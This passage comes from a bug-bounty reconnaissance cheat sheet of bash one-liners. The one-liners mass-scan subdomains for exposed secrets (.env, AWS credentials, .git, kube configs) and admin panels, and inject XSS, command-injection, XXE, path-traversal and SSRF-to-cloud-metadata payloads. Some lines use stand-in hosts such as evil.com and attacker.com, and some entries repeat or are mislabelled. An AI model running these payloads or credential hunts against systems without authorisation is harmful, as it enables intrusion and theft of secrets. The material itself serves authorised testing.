2245 | Identify Publicly Accessible .DS_Store (File Disclosure)
2246 | ```bash
2247 | cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt
2248 | ```
2249 |
2250 | Find Exposed Wordpress Debug Log (Sensitive Info)
2251 | ```bash
2252 | cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_log.txt
2253 | ```
2254 |
2255 | Check for Exposed Internal IP in Responses (SSR Leak)
2256 | ```bash
2257 | cat subdomains.txt | httpx -silent -fr '10\.|192\.168\.|172\.' -o internal_ip_leak.txt
2258 | ```
2259 |
2260 | Find Laravel Env Leak via Incorrect Env Handler
2261 | ```bash
2262 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o laravel_env_leak.txt
2263 | ```
2264 |
2265 | Scan for Exposed Backup Folders
2266 | ```bash
2267 | cat subdomains.txt | httpx -silent -path /backup -mc 200 -o backup_folder_exposed.txt
2268 | ```
2269 |
2270 | Look for Open Joomla Installers
2271 | ```bash
2272 | cat subdomains.txt | httpx -silent -path /installation/index.php -mc 200 -o joomla_installer.txt
2273 | ```
2274 |
2275 | Detect Exposed Debug Pages (debug=true)
2276 | ```bash
2277 | cat subdomains.txt | httpx -silent -fr 'debug=true' -o debug_pages.txt
2278 | ```
2279 |
2280 | Find Open Jira Dashboards
2281 | ```bash
2282 | cat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_open.txt
2283 | ```
2284 |
2285 | Scan for Exposed Backup Files (config.old, index.bak)
2286 | ```bash
2287 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.old\n/index.bak\n/wp-config.php.save') -mc 200 -o backup_leaks.txt
2288 | ```
2289 |
2290 | Detect Open Admin Portals (Common Paths)
2291 | ```bash
2292 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/login\n/dashboard\n/console') -mc 200 -o open_admin_portals.txt
2293 | ```
2294 |
2295 | Find Exposed Debug Toolbar (Django Debug)
2296 | ```bash
2297 | cat subdomains.txt | httpx -silent -path /__debug__/ -mc 200 -o django_debug_toolbar.txt
2298 | ```
2299 |
2300 | Detect Open Directories with Readable Files
2301 | ```bash
2302 | cat subdomains.txt | httpx -silent -fr '<title>Index of /' -o open_directory_listing.txt
2303 | ```
2304 |
2305 | Identify Exposed Proxy Logs (Squid / HAProxy)
2306 | ```bash
2307 | cat subdomains.txt | httpx -silent -path /var/log/squid/access.log -mc 200 -o proxy_logs_exposed.txt
2308 | ```
2309 |
2310 | Check for Public WebSockets Endpoints (Leaky API)
2311 | ```bash
2312 | cat subdomains.txt | httpx -silent -path /socket.io -mc 200 -o websocket_exposed.txt
2313 | ```
2314 |
2315 | Find Public GraphQL Consoles (Interactive API)
2316 | ```bash
2317 | cat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphiql_open.txt
2318 | ```
2319 |
2320 | Scan for Open Hadoop Resource Manager
2321 | ```bash
2322 | cat subdomains.txt | httpx -silent -path /ws/v1/cluster/info -mc 200 -o hadoop_exposed.txt
2323 | ```
2324 |
2325 | Detect Exposed PHPInfo Pages (Info Disclosure)
2326 | ```bash
2327 | cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
2328 | ```
2329 |
2330 | Find Publicly Accessible Wordpress XMLRPC (Brute Force Possible)
2331 | ```bash
2332 | cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_open.txt
2333 | ```
2334 |
2335 | Detect Open ElasticSearch Instances (Data Exposure)
2336 | ```bash
2337 | naabu -list subdomains.txt -p 9200 -silent | httpx -silent -path /_cat/indices?v -mc 200 -o open_elasticsearch.txt
2338 | ```
2339 |
2340 | Scan for Open Kubernetes Config (Cluster Info Leak)
2341 | ```bash
2342 | cat subdomains.txt | httpx -silent -path /.kube/config -mc 200 -o kube_config_exposed.txt
2343 | ```
2344 |
2345 | Find GraphQL Endpoints with Introspection Enabled
2346 | ```bash
2347 | cat subdomains.txt | httpx -silent -path /graphql -mc 200 -fr 'Introspection' -o graphql_introspection.txt
2348 | ```
2349 |
2350 | Detect Misconfigured CORS (Allow-Origin: )
2351 | ```bash
2352 | cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr 'Access-Control-Allow-Origin: \*' -o cors_misconfig.txt
2353 | ```
2354 |
2355 | Look for Exposed Adminer (DB Management Tool)
2356 | ```bash
2357 | cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt
2358 | ```
2359 |
2360 | Detect Open Redis Commander UI (Unauth Control)
2361 | ```bash
2362 | cat subdomains.txt | httpx -silent -path /redis/ -mc 200 -o redis_ui_exposed.txt
2363 | ```
2364 |
2365 | Find Public GitLab CI/CD Config (Pipeline Disclosure)
2366 | ```bash
2367 | cat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt
2368 | ```
2369 |
2370 | Scan for Open Debug Mode in Flask Apps
2371 | ```bash
2372 | cat subdomains.txt | httpx -silent -path /console -mc 200 -o flask_debug_console.txt
2373 | ```
2374 |
2375 | Detect Open Exim/Webmin Panels
2376 | ```bash
2377 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/exim\n/webmin') -mc 200 -o open_exim_webmin.txt
2378 | ```
2379 |
2380 | Find Exposed Laravel Log Files (App Key Disclosure)
2381 | ```bash
2382 | cat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_logs_exposed.txt
2383 | ```
2384 |
2385 | Detect Public AWS Config Files (Credentials Leak)
2386 | ```bash
2387 | cat subdomains.txt | httpx -silent -path /.aws/credentials -mc 200 -o aws_creds_exposed.txt
2388 | ```
2389 |
2390 | Identify Open Favicon Files and Fingerprint Services
2391 | ```bash
2392 | cat subdomains.txt | httpx -silent -path /favicon.ico -o favicons/ && for icon in favicons/*; do shasum -a 256 $icon; done
2393 | ```
2394 |
2395 | Check for Exposed GitHub Workflow Files (.github/workflows)
2396 | ```bash
2397 | cat subdomains.txt | httpx -silent -path /.github/workflows/ -mc 200 -o github_workflows_exposed.txt
2398 | ```
2399 |
2400 | Find Jenkins Consoles with Anon Access
2401 | ```bash
2402 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_console.txt
2403 | ```
2404 |
2405 | Scan for Default Tomcat Admin Panels
2406 | ```bash
2407 | cat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_admin_exposed.txt
2408 | ```
2409 |
2410 | Look for Public Backup Files (tar/zip dumps)
2411 | ```bash
2412 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/db.sql') -mc 200 -o exposed_backups.txt
2413 | ```
2414 |
2415 | Check for Exposed Laravel Telescope Panels
2416 | ```bash
2417 | cat subdomains.txt | httpx -silent -path /telescope -mc 200 -o laravel_telescope.txt
2418 | ```
2419 |
2420 | Find Exposed VNC/TeamViewer/Web RDP
2421 | ```bash
2422 | naabu -list subdomains.txt -p 5900,3389 -silent -o remote_access_ports.txt
2423 | ```
2424 |
2425 | Detect Open Grafana Panels (Unauth Access)
2426 | ```bash
2427 | cat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt
2428 | ```
2429 |
2430 | Scan for Misconfigured API Endpoints
2431 | ```bash
2432 | cat subdomains.txt | nuclei -t misconfiguration/api-misconfiguration.yaml -o api_misconfigs.txt
2433 | ```
2434 |
2435 | Identify Exposed Internal DNS Resolvers
2436 | ```bash
2437 | cat subdomains.txt | dnsx -a -resp-only -silent | grep -E '10\.|192\.168\.|172\.' -o internal_dns.txt
2438 | ```
2439 |
2440 | Detect Anonymous FTP Access (File Exposure)
2441 | ```bash
2442 | nmap -p 21 --script ftp-anon -iL subdomains.txt -oN ftp_anon_scan.txt
2443 | ```
2444 |
2445 | Find Exposed Configuration Pages (config.php)
2446 | ```bash
2447 | cat subdomains.txt | httpx -silent -path /config.php -mc 200 -o config_php_exposed.txt
2448 | ```
2449 |
2450 | Identify Publicly Available Magento Admin Panels
2451 | ```bash
2452 | cat subdomains.txt | httpx -silent -path /admin -mc 200 -fr 'Magento' -o magento_admin_exposed.txt
2453 | ```
2454 |
2455 | Check for SSRF by Detecting Response Based Redirects
2456 | ```bash
2457 | cat subdomains.txt | httpx -silent -H "X-Forwarded-For: attacker.com" -fr 'Location: attacker.com' -o ssrf_possible.txt
2458 | ```
2459 |
2460 | Detect Exposed Env Files (.env with Secrets)
2461 | ```bash
2462 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt
2463 | ```
2464 |
2465 | Find XMLRPC Enabled on WordPress (Brute Force Vector)
2466 | ```bash
2467 | cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o wordpress_xmlrpc.txt
2468 | ```
2469 |
2470 | Identify Open Kibana Dashboards (Sensitive Logs)
2471 | ```bash
2472 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
2473 | ```
2474 |
2475 | Find Servers Exposing phpinfo() (Sensitive Config)
2476 | ```bash
2477 | cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
2478 | ```
2479 |
2480 | Detect Publicly Accessible Swagger APIs
2481 | ```bash
2482 | cat subdomains.txt | httpx -silent -path /swagger-ui/ -mc 200 -o swagger_exposed.txt
2483 | ```
2484 |
2485 | Search for SQL Dumps and Backup Files (db.sql/db.zip)
2486 | ```bash
2487 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/db.sql\n/backup.sql\n/database.sql') -mc 200 -o sql_dumps_exposed.txt
2488 | ```
2489 |
2490 | Detect LFI Points (path traversal)
2491 | ```bash
2492 | cat subdomains.txt | gf lfi | httpx -silent -o lfi_possible_urls.txt
2493 | ```
2494 |
2495 | Identify Reflected XSS via GET Parameters
2496 | ```bash
2497 | cat subdomains.txt | gf xss | qsreplace '"><img src=x onerror=alert(document.domain)>' | httpx -silent -fr '"><img src=x onerror=alert' -o reflected_xss.txt
2498 | ```
2499 |
2500 | Find Outdated WordPress Versions (Vuln Detection)
2501 | ```bash
2502 | cat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_readme.txt
2503 | ```
2504 |
2505 | Search for PHPMyAdmin Exposed Panels
2506 | ```bash
2507 | cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_exposed.txt
2508 | ```
2509 |
2510 | Detect Command Injection Points
2511 | ```bash
2512 | cat subdomains.txt | gf command-injection | qsreplace ';id' | httpx -silent -fr 'uid=' -o cmd_injection.txt
2513 | ```
2514 |
2515 | Find Exposed Docker Daemon API (Remote Control)
2516 | ```bash
2517 | naabu -list subdomains.txt -p 2375 -silent | httpx -silent -o docker_api_exposed.txt
2518 | ```
2519 |
2520 | Identify Open Git Directories (.git Exposed)
2521 | ```bash
2522 | cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_dirs_exposed.txt
2523 | ```
2524 |
2525 | Scan for Exposed Server Status Pages (Apache/Nginx)
2526 | ```bash
2527 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/server-status\n/nginx-status') -mc 200 -o server_status_exposed.txt
2528 | ```
2529 |
2530 | Detect Open Jenkins Panels with Script Console
2531 | ```bash
2532 | cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
2533 | ```
2534 |
2535 | Find Exposed AWS S3 Buckets via Subdomains
2536 | ```bash
2537 | cat subdomains.txt | nuclei -t s3-detect.yaml -o open_s3_buckets.txt
2538 | ```
2539 |
2540 | Search for Potential Open Redirects (Unsafe Redirects)
2541 | ```bash
2542 | cat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
2543 | ```
2544 |
2545 | Find Debug/Error Pages (Sensitive Stacktrace)
2546 | ```bash
2547 | cat subdomains.txt | httpx -silent -sc -fr 'error\|exception\|trace' -o error_pages.txt
2548 | ```
2549 |
2550 | Detect Exposed Jenkins API Endpoints
2551 | ```bash
2552 | cat subdomains.txt | httpx -silent -path /api/json -mc 200 -o jenkins_api_exposed.txt
2553 | ```
2554 |
2555 | Find Exposed Kubernetes Dashboard (Cluster Control)
2556 | ```bash
2557 | cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
2558 | ```
2559 |
2560 | Detect SSRF via Open Redirect Chains
2561 | ```bash
2562 | cat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\|instance-id' -o ssrf_exploitable.txt
2563 | ```
2564 |
2565 | Look for Backup or Archive Files (tar.gz, zip)
2566 | ```bash
2567 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.tar.gz\n/site-backup.zip') -mc 200 -o backup_files_exposed.txt
2568 | ```
2569 |
2570 | Identify Known Vulnerable CMS Versions
2571 | ```bash
2572 | nuclei -l subdomains.txt -t cves/ -o cms_cve_vulns.txt
2573 | ```
2574 |
2575 | Find JWT Tokens or Sensitive Tokens in Responses
2576 | ```bash
2577 | cat subdomains.txt | httpx -silent -sr | grep -Eo 'eyJ[^"]+' | tee jwt_tokens.txt
2578 | ```
2579 |
2580 | Detect Basic Auth Protected Pages (Bruteforce Target)
2581 | ```bash
2582 | cat subdomains.txt | httpx -silent -sc -H "Authorization: Basic fakeauth" -o basic_auth_detected.txt
2583 | ```
2584 |
2585 | Detect Exposed .git Repositories (Full Source Code Leak)
2586 | ```bash
2587 | cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_repos.txt
2588 | ```
2589 |
2590 | Find Public .DS_Store Files (Directory Listing Exposure)
2591 | ```bash
2592 | cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt
2593 | ```
2594 |
2595 | Scan for Exposed .svn Repos (Source Code Leak)
2596 | ```bash
2597 | cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_repos_exposed.txt
2598 | ```
2599 |
2600 | Find Open GraphQL Endpoints (GraphQL Injection)
2601 | ```bash
2602 | cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_exposed.txt
2603 | ```
2604 |
2605 | Detect Exposed Laravel Debug Pages (Full App Secrets)
2606 | ```bash
2607 | cat subdomains.txt | httpx -silent -path /_ignition/health-check -mc 200 -o laravel_debug_exposed.txt
2608 | ```
2609 |
2610 | Check for File Upload Points (RCE Chances)
2611 | ```bash
2612 | cat subdomains.txt | gf upload | httpx -silent -o file_upload_points.txt
2613 | ```
2614 |
2615 | Find XML External Entity (XXE) Injection Points
2616 | ```bash
2617 | cat subdomains.txt | gf xxe | qsreplace 'file:///etc/passwd' | httpx -silent -fr 'root:x' -o xxe_exploitable.txt
2618 | ```
2619 |
2620 | Detect Misconfigured AWS Cognito Pools (Token Takeover)
2621 | ```bash
2622 | cat subdomains.txt | nuclei -t misconfiguration/cognito-detect.yaml -o aws_cognito_misconfig.txt
2623 | ```
2624 |
2625 | Scan for Open Cloud Storage Buckets (GCP/Azure)
2626 | ```bash
2627 | cat subdomains.txt | nuclei -t exposed-storage/ -o cloud_buckets_exposed.txt
2628 | ```
2629 |
2630 | Find Sensitive Files via URL Fuzzing
2631 | ```bash
2632 | ffuf -u FUZZ -w wordlists/sensitive-files.txt -mc 200 -o sensitive_files_found.txt
2633 | ```
2634 |
2635 | Detect Open Prometheus Panels (Monitoring Exposure)
2636 | ```bash
2637 | cat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt
2638 | ```
2639 |
2640 | Find Open Redirection in APIs
2641 | ```bash
2642 | cat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects_apis.txt
2643 | ```
2644 |
2645 | Detect Misconfigured CORS (Any Origin Allowed)
2646 | ```bash
2647 | cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr "access-control-allow-origin: https://evil.com" -o misconfigured_cors.txt
2648 | ```
2649 |
2650 | Detect Backup Archives (Zip/Tar Files)
2651 | ```bash
2652 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/site-backup.zip') -mc 200 -o backup_archives_found.txt
2653 | ```
2654 |
2655 | Find Exposed Debug Logs (Stack Traces, Errors)
2656 | ```bash
2657 | cat subdomains.txt | httpx -silent -path /debug.log -mc 200 -o debug_logs_exposed.txt
2658 | ```
2659 |
2660 | Scan for SSRF via Parameter Fuzzing
2661 | ```bash
2662 | cat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\|instance-id' -o ssrf_targets.txt
2663 | ```
2664 |
2665 | Identify Server Headers for Misconfig Analysis
2666 | ```bash
2667 | cat subdomains.txt | httpx -silent -sc -H 'X-Check: true' -o headers_info.txt
2668 | ```
2669 |
2670 | Detect Missing Security Headers (Hardening Issues)
2671 | ```bash
2672 | cat subdomains.txt | nuclei -t security-misconfiguration/ -o missing_security_headers.txt
2673 | ```
2674 |
2675 | Find Exposed WordPress Debug Logs
2676 | ```bash
2677 | cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wordpress_debug_log.txt
2678 | ```
2679 |
2680 | Detect Exposed GITLAB CI Files (Pipeline Secrets)
2681 | ```bash
2682 | cat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt
2683 | ```
2684 |
2685 | Find API Keys Leaked in JS Files
2686 | ```bash
2687 | katana -list subdomains.txt -silent -js | grep -E 'apiKey|client_secret|access_token' -o api_keys_leaked.txt
2688 | ```
2689 |
2690 | Detect Old PHPMyAdmin Panels (Known Vulns)
2691 | ```bash
2692 | cat subdomains.txt | httpx -silent -path /phpmyadmin/ -mc 200 -o phpmyadmin_found.txt
2693 | ```
2694 |
2695 | Identify Exposed Kibana Panels (Log Monitoring)
2696 | ```bash
2697 | cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_panels_exposed.txt
2698 | ```
2699 |
2700 | Scan for Path Traversal (../../etc/passwd)
2701 | ```bash
2702 | cat subdomains.txt | gf lfi | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal_found.txt
2703 | ```
2704 |
2705 | Find Open Admin Panels (Unprotected Login)
2706 | ```bash
2707 | cat subdomains.txt | nuclei -t exposed-panels/ -o admin_panels_exposed.txt
2708 | ```
2709 |
2710 | Detect Known CVEs via Nuclei (Automated Vuln Scan)
2711 | ```bash
2712 | nuclei -l subdomains.txt -t cves/ -o known_cves_found.txt
2713 | ```
2714 |
2715 | Identify Unsafe Redirects (via Location Header)
2716 | ```bash
2717 | cat subdomains.txt | httpx -silent -sc -o redirects.txt && cat redirects.txt | grep 'Location:' | grep -i 'http'
2718 | ```
2719 |
2720 | Find Kubernetes Dashboard Exposures
2721 | ```bash
2722 | cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
2723 | ```
2724 |
2725 | Exposed Swagger / API Documentation
2726 | ```bash
2727 | curl -s https://target.com/swagger.json
2728 | ```
2729 |
2730 | Admin Panel Discovery (CMS Detection)
2731 | ```bash
2732 | curl -s https://target.com/admin/ | grep -i 'cms'
2733 | ```
2734 |
2735 | GCP Metadata SSRF Check
2736 | ```bash
2737 | curl "https://target.com/?url=http://metadata.google.internal/computeMetadata/v1/ -H 'Metadata-Flavor: Google'"
2738 | ```
2739 |
2740 | Azure Metadata Leak via SSRF
2741 | ```bash
2742 | curl "https://target.com/?url=http://169.254.169.254/metadata/instance?api-version=2021-01-01" -H "Metadata: true"
2743 | ```
2744 |
2745 | OAuth Token Leak in Referrer
2746 | ```bash
2747 | curl -I https://target.com/oauth/callback?code=abcd1234
2748 | ```
2749 |
2750 | AWS Keys Hunt in Public Repos (with GitHub CLI)
2751 | ```bash
2752 | gh search code "AWS_ACCESS_KEY_ID" --language python --limit 100
2753 | ```
2754 |
2755 | IDOR via Incrementing Document IDs
2756 | ```bash
2757 | for id in $(seq 1 100); do curl -s https://target.com/documents/$id; done
2758 | ```
2759 |
2760 | Sensitive Backup File Discovery
2761 | ```bash
2762 | curl -I https://target.com/config.bak
2763 | ```
2764 |
2765 | JWT Key Disclosure via Well-Known File
2766 | ```bash
2767 | curl -s https://target.com/.well-known/jwks.json
2768 | ```
2769 |
2770 | Mobile Deep Link Misconfig Check
2771 | ```bash
2772 | adb shell am start -a android.intent.action.VIEW -d "target://app/link?param=test"
2773 | ```
2774 |
2775 | Testing Rate Limiting (Brute Force)
2776 | ```bash
2777 | seq 1 1000 | xargs -P10 -I{} curl -X POST "https://target.com/api/login" -d 'user=admin&password=wrong{}'
2778 | ```
2779 |
2780 | Client-Side Security Headers Audit
2781 | ```bash
2782 | curl -I https://target.com | grep -Ei 'strict-transport|content-security|x-frame'
2783 | ```
2784 |
2785 | Session Fixation Check
2786 | Reuse session after login/logout:
2787 | ```bash
2788 | curl -c cookies.txt https://target.com/login && curl -b cookies.txt https://target.com/dashboard
2789 | ```
2790 |
2791 | Exposed Debug Endpoints
2792 | ```bash
2793 | curl -s https://target.com/debug/vars
2794 | ```
2795 |
2796 | Direct Database Query via GraphQL
2797 | ```bash
2798 | curl -X POST https://target.com/graphql -d '{"query":"{users{username,password}}"}'
2799 | ```
2800 |
2801 | DNS Zone Transfer Misconfig (AXFR)
2802 | ```bash
2803 | dig axfr target.com @ns1.target.com
2804 | ```
2805 |
2806 | Misconfigured CNAME Takeover
2807 | ```bash
2808 | dig cname subdomain.target.com
2809 | ```
2810 |
2811 | LFI via Parameter Tampering
2812 | ```bash
2813 | curl "https://target.com/page?file=../../../../etc/passwd"
2814 | ```
2815 |
2816 | WebSocket Security Check (Frame Injection)
2817 | ```bash
2818 | wscat -c ws://target.com/socket
2819 | ```
2820 |
2821 | Sensitive Parameter Brute Force
2822 | ```bash
2823 | cat params.txt | xargs -I{} curl -s "https://target.com/?{}=test"
2824 | ```
2825 |
2826 | GraphQL Introspection Check
2827 | ```bash
2828 | curl -X POST https://target.com/graphql -d '{"query":"{__schema{types{name}}}"}'
2829 | ```
2830 |
2831 | Public GitHub Secrets Hunt
2832 | ```bash
2833 | gh search code "api_key" --repo target/repo
2834 | ```
2835 |
2836 | CSP Bypass Discovery
2837 | ```bash
2838 | curl -I https://target.com | grep -i content-security-policy
2839 | ```
2840 |
2841 | Kubernetes Dashboard Exposure
2842 | ```bash
2843 | curl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/
2844 | ```
2845 |
2846 | Google Dorking One-Liner
2847 | ```bash
2848 | xdg-open "https://www.google.com/search?q=site:target.com filetype:env"
2849 | ```
2850 |
2851 | Firebase Database Exposure Check
2852 | ```bash
2853 | curl -s https://target.firebaseio.com/.json
2854 | ```
2855 |
2856 | Header Injection Test
2857 | ```bash
2858 | curl -I "https://target.com/%0D%0AX-Test:evil"
2859 | ```
2860 |
2861 | AWS S3 Bucket Direct List
2862 | ```bash
2863 | curl https://target.s3.amazonaws.com/
2864 | ```
2865 |
2866 | Test SSRF via Redirect
2867 | ```bash
2868 | curl "https://target.com/redirect?url=http://169.254.169.254"
2869 | ```
2870 |
2871 | Test Command Injection via Headers
2872 | ```bash
2873 | curl -H "User-Agent: ;id" https://target.com/
2874 | ```
2875 |
2876 | Exposed Git Folder
2877 | ```bash
2878 | curl -s https://target.com/.git/config
2879 | ```
2880 |
2881 | GCP Storage Bucket Exposure
2882 | ```bash
2883 | curl -s https://storage.googleapis.com/target-bucket-name/
2884 | ```
2885 |
2886 | Open Redirect Discovery
2887 | ```bash
2888 | curl -I "https://target.com/redirect?url=https://evil.com"
2889 | ```
2890 |
2891 | Fast Path Traversal Discovery
2892 | ```bash
2893 | curl "https://target.com/download?file=../../../../etc/passwd"
2894 | ```
2895 |
2896 | Testing File Upload Handling
2897 | ```bash
2898 | curl -F "file=@/etc/passwd" https://target.com/upload
2899 | ```
2900 |
2901 | Subdomain Takeover Check (CNAME)
2902 | ```bash
2903 | dig cname sub.target.com
2904 | ```
2905 |
2906 | Check for Anonymous FTP Access
2907 | ```bash
2908 | ftp target.com
2909 | ```
2910 |
2911 | Backup Files Finder
2912 | ```bash
2913 | curl -I https://target.com/index.php.bak
2914 | ```
2915 |
2916 | CloudFront Misconfiguration Detection
2917 | ```bash
2918 | curl -I https://target.cloudfront.net
2919 | ```
2920 |
2921 | Public Trello/Slack Links in Code
2922 | ```bash
2923 | gh search code "trello.com/b/" --repo target/repo
2924 | ```
2925 |
2926 | Email Spoofing via Misconfigured SPF
2927 | ```bash
2928 | dig txt target.com
2929 | ```
2930 |
2931 | Weak JWT Secret Guessing
2932 | ```bash
2933 | echo -n 'eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VyIjogImFkbWluIn0' | base64 -d
2934 | ```
2935 |
2936 | Test for Public Firebase Storage
2937 | ```bash
2938 | curl -s https://target.firebaseio.com/.json
2939 | ```
2940 |
2941 | Unrestricted File Download (Insecure Direct Object Reference)
2942 | ```bash
2943 | curl -s https://target.com/files/1.pdf
2944 | ```
2945 |
2946 | Discover Admin Portals
2947 | ```bash
2948 | gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2949 | ```
2950 |
2951 | Check for Debug Endpoints
2952 | ```bash
2953 | curl -s https://target.com/debug/vars
2954 | ```
2955 |
2956 | **Server Header Disclosure**
2957 | ```bash
2958 | curl -I https://target.com | grep Server
2959 | ```
2960 |
2961 | **Find Exposed GitHub Actions Secrets**
2962 | ```bash
2963 | gh api repos/target/repo/actions/secrets
2964 | ```
2965 |
2966 | **Test Blind XSS via User-Agent**
2967 | ```bash
2968 | curl -A "<script>alert(document.domain)</script>" https://target.com/
2969 | ```
2970 |
2971 | **Test for PHP Info Disclosure**
2972 | ```bash
2973 | curl -s https://target.com/phpinfo.php
2974 | ```
2975 |
2976 | **Exposed Kubernetes Dashboard via Proxy**
2977 | ```bash
2978 | curl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/
2979 | ```
2980 |
2981 | **GraphQL Schema Discovery**
2982 | ```bash
2983 | curl -X POST https://target.com/graphql -d '{"query":"{__schema{types{name}}}"}'
2984 | ```
2985 |
2986 | **Check for Exposed AWS Lambda Function**
2987 | ```bash
2988 | curl -s https://target.com/.netlify/functions/
2989 | ```
2990 |
2991 | **Sensitive Parameter Fuzzing**
2992 | ```bash
2993 | ffuf -u https://target.com/?FUZZ=test -w params.txt
2994 | ```
2995 |
2996 | **Detect Misconfigured CORS**
2997 | ```bash
2998 | curl -I -H "Origin: https://evil.com" https://target.com
2999 | ```
3000 |
3001 | **Check for Weak JWT Tokens (None Algorithm)**
3002 | ```bash
3003 | curl -s https://target.com/api -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ."
3004 | ```
3005 |
3006 | **Exposed .env Files (Sensitive Config)**
3007 | ```bash
3008 | curl -s https://target.com/.env
3009 | ```
3010 |
3011 | **Sensitive GitHub Issues (Bug Bounty Targets)**
3012 | ```bash
3013 | gh issue list --repo target/repo --search "security"
3014 | ```
3015 |
3016 | **Exposed Internal IP Disclosure via Headers**
3017 | ```bash
3018 | curl -I https://target.com | grep -i 'x-originating-ip\|x-forwarded-for'
3019 | ```
3020 |
3021 | **Reverse Proxy Bypass Tricks**
3022 | ```bash
3023 | curl -I https://target.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
3024 | ```
3025 |
3026 | **Check for SSRF via Open Redirects**
3027 | ```bash
3028 | curl "https://target.com/redirect?url=http://burpcollaborator.net"
3029 | ```
3030 |
3031 | **Check for Command Injection in Parameters**
3032 | ```bash
3033 | curl "https://target.com/ping?host=127.0.0.1;id"
3034 | ```
3035 |
3036 | **Test for XML External Entity (XXE)**
3037 | ```bash
3038 | curl -X POST https://target.com/upload -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>'
3039 | ```
3040 |
3041 | **Test for Server-Side Template Injection (SSTI)**
3042 | ```bash
3043 | curl "https://target.com/render?template={{7*7}}"
3044 | ```
3045 |
3046 | **Sensitive File Leak Check (.DS_Store, .bak)**
3047 | ```bash
3048 | curl -I https://target.com/.DS_Store
3049 | ```
3050 |
3051 | **DNS Takeover Discovery**
3052 | ```bash
3053 | host -t cname sub.target.com
3054 | ```
3055 |
3056 | **Test for Misconfigured CORS (Wildcard Origin)**
3057 | ```bash
3058 | curl -I -H "Origin: https://evil.com" https://target.com
3059 | ```
3060 |
3061 | **Directory Traversal with Double Encoding**
3062 | ```bash
3063 | curl "https://target.com/download?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd"
3064 | ```
3065 |
3066 | **Check for Exposed Configuration Files**
3067 | ```bash
3068 | curl -s https://target.com/wp-config.php
3069 | ```
3070 |
3071 | **Find Environment Variables in Responses**
3072 | ```bash
3073 | curl -s https://target.com | grep -E 'AWS_ACCESS_KEY|DB_PASSWORD'
3074 | ```
3075 |
3076 | **Check for Misconfigured Security Headers**
3077 | ```bash
3078 | curl -I https://target.com | grep -i "X-Frame-Options\|Content-Security-Policy\|Strict-Transport-Security"
3079 | ```
3080 |
3081 | **Test for Gopher SSRF**
3082 | ```bash
3083 | curl "https://target.com/?url=gopher://127.0.0.1:6379/_INFO"
3084 | ```
3085 |
3086 | **Open Admin Panels Discovery**
3087 | ```bash
